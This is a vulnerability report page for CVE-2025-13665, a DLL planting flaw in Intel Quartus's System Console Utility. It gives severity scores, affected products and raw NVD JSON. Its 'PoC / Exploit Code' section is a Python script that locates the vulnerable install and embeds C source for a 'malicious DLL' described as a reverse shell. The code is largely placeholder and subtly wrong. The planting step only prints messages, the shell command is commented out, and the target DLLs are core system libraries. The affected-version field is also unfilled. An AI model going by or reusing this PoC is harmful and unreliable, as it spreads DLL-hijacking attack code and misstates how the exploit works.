Security Vulnerability Report
中文
CVE-2025-13665 CVSS 6.7 MEDIUM

CVE-2025-13665

Published: 2025-12-12 03:15:52
Last Modified: 2026-01-12 15:08:57
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

The System Console Utility for Windows is vulnerable to a DLL planting vulnerability

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Intel Quartus Prime (System Console Utility) < 受影响版本
Altera Quartus II (System Console Utility) < 受影响版本
具体版本信息需参考Intel官方安全公告 ASA-0002

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-13665 DLL Planting PoC for System Console Utility for Windows # This PoC demonstrates the DLL hijacking vulnerability import os import ctypes import shutil from pathlib import Path def create_malicious_dll(): """ Generate malicious DLL that will be planted in target directory This DLL creates a reverse shell when loaded by vulnerable application """ dll_code = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Malicious code execution on DLL load // In real attack, this would establish C2 connection or execute payload // Create marker file to indicate successful DLL hijacking HANDLE hFile = CreateFileA( "C:\\\\Temp\\\\cve_2025_13665_poc_success.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile != INVALID_HANDLE_VALUE) { const char* msg = "CVE-2025-13665 DLL Planting Successful!"; DWORD bytesWritten; WriteFile(hFile, msg, strlen(msg), &bytesWritten, NULL); CloseHandle(hFile); } // Execute payload - reverse shell connection // system("cmd.exe /c <attacker_command>"); } return TRUE; } ''' return dll_code def plant_dll(target_dir, dll_name): """ Plant malicious DLL in target application directory """ malicious_dll = os.path.join(target_dir, dll_name) # Create malicious DLL content (compiled version would be actual DLL) print(f"[*] Planting malicious DLL: {malicious_dll}") print(f"[*] In real attack, this would be a compiled DLL with malicious payload") return True def check_vulnerability(): """ Check if System Console Utility is installed and vulnerable """ possible_paths = [ r"C:\Program Files\Intel\Quartus Prime\bin\system_console.exe", r"C:\intelFPGA\quartus\bin\system_console.exe", os.path.expanduser(r"~\intelFPGA\quartus\bin\system_console.exe") ] vulnerable_path = None for path in possible_paths: if os.path.exists(path): vulnerable_path = path break if vulnerable_path: print(f"[+] Found vulnerable application: {vulnerable_path}") return vulnerable_path else: print("[-] System Console Utility not found in common locations") return None def main(): print("=" * 60) print("CVE-2025-13665 DLL Planting Vulnerability PoC") print("Target: Intel System Console Utility for Windows") print("=" * 60) # Check if vulnerable application exists app_path = check_vulnerability() if not app_path: print("\n[!] Target application not found. This is for educational purposes only.") return # Get application directory app_dir = os.path.dirname(app_path) # Common DLLs that System Console might load common_dlls = [ "msvcrt.dll", "kernel32.dll", "user32.dll", "ntdll.dll" ] print(f"\n[*] Application directory: {app_dir}") print("[*] Attempting to plant DLL in application directory...") for dll in common_dlls: plant_dll(app_dir, dll) print("\n[!] PoC demonstrates the vulnerability concept.") print("[!] In a real attack: 1) Compile malicious DLL 2) Plant in target directory 3) Execute application") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13665", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2025-12-12T03:15:51.523", "lastModified": "2026-01-12T15:08:56.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The System Console Utility for Windows is vulnerable to a DLL planting vulnerability"}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "43015EF2-79B8-4036-B471-361484D952D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0002", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}